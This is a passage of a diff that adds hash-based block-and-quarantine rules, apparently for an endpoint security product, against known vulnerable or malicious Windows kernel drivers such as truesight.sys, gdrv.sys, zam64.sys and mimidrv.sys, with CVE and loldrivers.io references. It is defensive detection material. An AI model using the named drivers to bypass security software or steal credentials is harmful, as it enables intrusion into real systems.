+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492027Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65206a8a5700b4b0f9d8e2fd8e2f761b7af5af9d2d6cbd754da8cc258acd2a76",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51c70e1d-21db-5b56-98ad-6260a58202ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471801Z",
+ "creation_date": "2026-03-23T11:45:30.471804Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471814Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b4c07f7e7c87518e8950eb0651ae34832b1ecee56c89cdfbd1b4efa8cf97779f",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51cf5dba-c570-5537-88b5-274f7c16af18",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836735Z",
+ "creation_date": "2026-03-23T11:45:30.836737Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836743Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de183d93f715ca042b42104b1d9b4151af3a75c97d05c5b2dbc76f152be7c7cc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51dea23f-b7d5-59dc-a3b3-89486eb082f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493311Z",
+ "creation_date": "2026-03-23T11:45:31.493313Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13f8fb9643a8d4a721ed8f1ae882d4ef8be6413d7b35feb142e42cf787a086be",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51e9f54c-f453-565a-b5f0-125296cfc08c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828130Z",
+ "creation_date": "2026-03-23T11:45:31.828132Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828138Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05ab8bf3a58a99bb1a0b32df46728bc90bc27ca5c7c544db87a285451b3a6814",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51eb126e-d7dd-5d46-9cd5-a3b0e3cc8766",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609521Z",
+ "creation_date": "2026-03-23T11:45:29.609523Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609529Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ede3c99d8a049232cd6baae9d44518a73c19d93230a1d320407a3fc2f506569",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "51f2041c-7a8a-5737-b7c7-81ff80a29566",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476692Z",
+ "creation_date": "2026-03-23T11:45:31.476696Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476706Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6f817b25ae79245b86072bc94445f9770905847274fe42da5982425721024f1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52063f46-ec10-59b2-a17e-689557f8a155",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154367Z",
+ "creation_date": "2026-03-23T11:45:31.154369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154376Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76014259f86bc9d475cee4224a575ef12f3ac36b450243bd95a96bdaa44a6c38",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52081c76-6763-547d-abfb-1c397dc5e058",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620220Z",
+ "creation_date": "2026-03-23T11:45:29.620222Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "520bda32-7ae7-53de-91fe-7e2de6e096c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974891Z",
+ "creation_date": "2026-03-23T11:45:29.974893Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974899Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d33fe3bbcdf1ef7e42faf4ac81d7da3a6451eb67b477e78b75506b0df21cf598",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5212743f-a2e0-5408-8f64-fa5abf38315b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971524Z",
+ "creation_date": "2026-03-23T11:45:29.971526Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab1290211250af83be645072d346693890f3f29feda5a3a23ea97758247f7ba1",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5225b412-128d-508d-8c8f-18dc7e803097",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983526Z",
+ "creation_date": "2026-03-23T11:45:29.983528Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983533Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bce4a327c9e77631c03057b0e45cdbb2e751194d42995c0310e3ccdd3d33b7c",
+ "comment": "Vulnerable Kernel Driver (aka KfeCo10X64.sys) [https://www.loldrivers.io/drivers/3e0bf6dc-791b-4170-8c40-427e7299d93d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5227df82-4230-500e-bbdc-967a6ff44eb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492503Z",
+ "creation_date": "2026-03-23T11:45:31.492505Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492511Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e68cc70961503821360b0736a94f0467a459663aedbf6796dad4181aa249a8d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "523170c7-5efc-5744-9349-7b2a9becf6b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830221Z",
+ "creation_date": "2026-03-23T11:45:31.830223Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830228Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "316e85e43f0045ae7750509fa89e4d48fdb7e47cd531da2256b8a2e6c54e6316",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5237593d-cad5-5f50-abc9-de0dba341973",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465198Z",
+ "creation_date": "2026-03-23T11:45:30.465202Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85b9d7344bf847349b5d58ebe4d44fd63679a36164505271593ef1076aa163b2",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "523b942d-1e72-5ff3-b3d1-53f595f974b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459327Z",
+ "creation_date": "2026-03-23T11:45:30.459331Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459340Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26d67d479dafe6b33c980bd1eed0b6d749f43d05d001c5dcaaf5fcddb9b899fe",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "523ed949-7bc9-5147-a3a6-fcd5cae174df",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493516Z",
+ "creation_date": "2026-03-23T11:45:31.493519Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493527Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42274df7bd76ccb91baec7223fbb6c984abccf3c705a134a498305458f52e5a8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "523f993f-588a-5540-883f-13cfd924647f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497533Z",
+ "creation_date": "2026-03-23T11:45:31.497537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497546Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de1bdf123f8b92d6250b02c89267823147ce36f1c0fd4fdca1bb18c2eb17952b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "524844ea-7cc0-58f2-bb74-72cc944c3776",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486473Z",
+ "creation_date": "2026-03-23T11:45:31.486476Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486484Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9d924ecdc0f37c9ebc71429052105e6493024c59b6990a9c6d5bd5846425be5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "524d68d9-8dea-56b9-a6d0-6be41c9bc78b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145679Z",
+ "creation_date": "2026-03-23T11:45:32.145681Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145687Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16aca71339240826d226f4adbfa73ea7b065f0f2d145d82d6ac2349d2ebba0d2",
+ "comment": "Malicious Kernel Driver (aka driver_930da474.sys) [https://www.loldrivers.io/drivers/4c4e7664-af86-4483-858a-f59346f3d304/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52528de0-a22c-5e68-8ec3-314907fc1416",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824586Z",
+ "creation_date": "2026-03-23T11:45:30.824589Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824597Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee43ea46cb984759b46f88360079e5f4e7f80f6c5b177abff3c57ca3ba96069b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "525cf231-0c78-51dd-8dbc-4f44c0842b15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463699Z",
+ "creation_date": "2026-03-23T11:45:30.463703Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463712Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "406b844f4b5c82caf26056c67f9815ad8ecf1e6e5b07d446b456e5ff4a1476f9",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "52622982-f318-500e-968f-42b35bca81bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826491Z",
+ "creation_date": "2026-03-23T11:45:31.826493Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826498Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46c0c7f394a9a400ae7d7cc9de29c7de3d808adbc1d6c5e9f85ff0636871fabc",
